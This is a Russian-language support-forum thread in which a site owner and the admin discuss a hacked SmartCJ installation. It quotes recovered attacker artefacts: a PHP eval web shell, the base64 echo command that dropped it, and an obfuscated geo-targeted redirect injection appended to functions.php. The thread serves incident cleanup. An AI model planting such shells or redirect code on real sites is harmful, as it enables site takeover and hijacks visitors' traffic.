SmartCJ Free берёт только с кликов или уже с прогрузки морды?

awmxex
Posts: 42
Joined: Fri Mar 23, 2018 10:09 am
Contact:

Re: SmartCJ Free берёт только с кликов или уже с прогрузки морды?

Post by awmxex »

Уже как пол года такая история
1. Сначала думал через sql инекцию так как в логах были запросы, но Леман сказал, что стандартная практика на скан
2. А так смотри файлы в корне (sex.php или что то в этом вроде с таким содержанием <?php eval($_POST[1]); ?>) удаляй
3. Шелы в директориях сайта и в папке tmp, типа /tmp/.config.elf
файлы для выполнения создавались с шела (в bash логи :
echo "PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==" | base64 -d >cc.php)
Сейчас закрыл доступ к шеллу юзверей (не помогало), нашел что ктото ssh ключ свой прописал, удалил и ограничил доступ к ssh по ip
пока вроде тишина но, все же кажется кудато что то уходит потому, что тоже левые редиректы проскакивают еще на этот домен noads1.com (раньше на этот же https://datingshall.life/)
ну и htaccess проверь

Ат так я понимаю надо ставить auditit b смотреть в режиме онлайн
awmxex
Posts: 42
Joined: Fri Mar 23, 2018 10:09 am
Contact:

Re: SmartCJ Free берёт только с кликов или уже с прогрузки морды?

Post by awmxex »

а забыл добавить еще тут нужно проверить
includes/config.php ничего туда не дописали ли, и права на всяк случай 444 поставить

з.ы. Давайте да в жтой теме все обсуждать, глядишь вместе и поборем
awmxex
Posts: 42
Joined: Fri Mar 23, 2018 10:09 am
Contact:

Re: SmartCJ Free берёт только с кликов или уже с прогрузки морды?

Post by awmxex »

Ну и admin/graph (04.03.2023 у меня такая дата)
admin
Site Admin
Posts: 37202
Joined: Wed Sep 10, 2008 11:43 am

Re: SmartCJ Free берёт только с кликов или уже с прогрузки морды?

Post by admin »

те у кого то были такие права доступа что б он смог прописал свой ключ в шеле?

и как выяснилось какие были команды? оставлись логи баша?

>> 3. Шелы в директориях сайта и в папке tmp, типа /tmp/.config.elf
и смарт не писал что есть левые файлы?
Don't forget to run script update
awmxex
Posts: 42
Joined: Fri Mar 23, 2018 10:09 am
Contact:

Re: SmartCJ Free берёт только с кликов или уже с прогрузки морды?

Post by awmxex »

все файлы были созданы от user'a
логов авторизаций не было, но в логах баша были команды
в tmp папке не домена а сервака
awmxex
Posts: 42
Joined: Fri Mar 23, 2018 10:09 am
Contact:

Re: SmartCJ Free берёт только с кликов или уже с прогрузки морды?

Post by awmxex »

еще нашел сюда любит прописываться
scj/includes/libs/functions.php

в конце файла

@error_reporting(0);
if(isset($_GET['noads1'])) {die("ads");}
if(!preg_match("/feed|noneed|admin|login|register|xml|feed|rpc|rss/i",@$_SERVER['REQUEST_URI'])) {
if(!preg_match("/\.(zip|rar|tar|tgz|xml|txt|doc|tiff|css|js|pdf|doc|jpg|gif|ico|jpeg|png)/i",$_SERVER['REQUEST_URI']) && !isset($_GET['noneed']) && !isset($_COOKIE['pageold']) && !preg_match("/ru/i", @$_SERVER['HTTP_ACCEPT_LANGUAGE']) && strlen(@$_SERVER['HTTP_ACCEPT_LANGUAGE'])>1 && strlen(@$_SERVER['HTTP_USER_AGENT'])>5 && !preg_match("/smartcj|bot|crawl|python|search/i",@$_SERVER['HTTP_USER_AGENT'])) {
if(mt_rand(1,3) === 3) {
$h = rawurlencode(base64_encode(@$_SERVER['HTTP_HOST']));
$r = rawurlencode(base64_encode(@$_SERVER['HTTP_REFERER']));
$u = rawurlencode(base64_encode(@$_SERVER['REQUEST_URI']));
@setcookie("pageold", "true", 2147483647);
$countryc = "XX";
if(isset($_SERVER["GEOIP_COUNTRY_CODE"])) {
$countryc = @$_SERVER["GEOIP_COUNTRY_CODE"];
}
$okk = array("DE","IT","ES","UK","US","AU","CA","IT","PL","CZ","HU","FR","NL","AT","EC","CI","NO","CH","MY","SE","BE","PT","SK","IE","SG","DK","NZ","BG","RO","ZA","MA","CL","IL","GE","FI","SI","GR");
if(in_array($countryc, $okk)) {
@header("\x4c\x6f\x63\x61\164\151\157\156\72\40\150\x74\164\160\163\x3a\x2f\57\160\162\x6f\163\164\151\x62\162\157\56\x63\x6f\155\57\x61\57\x3f\x68\x3d{$h}\x26\x72\x3d{$r}\x26\165\x3d{$u}");exit();
}

}
}
}
@require_once "/var/user/data/www/domain.com/scj/admin/graph/jpgraph_plotmark.inc";
?>
awmxex
Posts: 42
Joined: Fri Mar 23, 2018 10:09 am
Contact:

Re: SmartCJ Free берёт только с кликов или уже с прогрузки морды?

Post by awmxex »

и судя по f(in_array($countryc,$okk)){header("Location: https://prostibro.com/a/?h={$h}&r={$r}&u={$u}");exit();}}
человек наш, и думаю тоже читает это форум раз такая глобальная трабла у всех
admin
Site Admin
Posts: 37202
Joined: Wed Sep 10, 2008 11:43 am

Re: SmartCJ Free берёт только с кликов или уже с прогрузки морды?

Post by admin »

awmxex wrote: Fri Apr 14, 2023 8:04 pm все файлы были созданы от user'a
логов авторизаций не было, но в логах баша были команды
в tmp папке не домена а сервака
те можно проверить логины юзера шел\фтп или еще какие-то варианты как мог получить юзерский доступ

что админ проверял?
Don't forget to run script update
awmxex
Posts: 42
Joined: Fri Mar 23, 2018 10:09 am
Contact:

Re: SmartCJ Free берёт только с кликов или уже с прогрузки морды?

Post by awmxex »

я сам админ, хреновый но какой есть)

у меня в логах пусто, единственные логи где хоть что то есть это, это логи баша, что пользователь создавал echo "PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==" | base64 -d >cc.php, с таким содержанием <?php eval($_POST[1]); ?>)

это единственное что я нашел по логам

кстати точно сказать не могу но смарт на бяку в этом файле, вроде не ругался scj/includes/libs/functions.php
awmxex
Posts: 42
Joined: Fri Mar 23, 2018 10:09 am
Contact:

Re: SmartCJ Free берёт только с кликов или уже с прогрузки морды?

Post by awmxex »

а вообще у меня вся хрень и эти файлы начались с viewtopic.php?p=196911#p196911 , хз может просто совпадение
кстати тьфу тьфу после последнего обновления и закрытия доступа к шелу по ip вроде пока тишина
Post Reply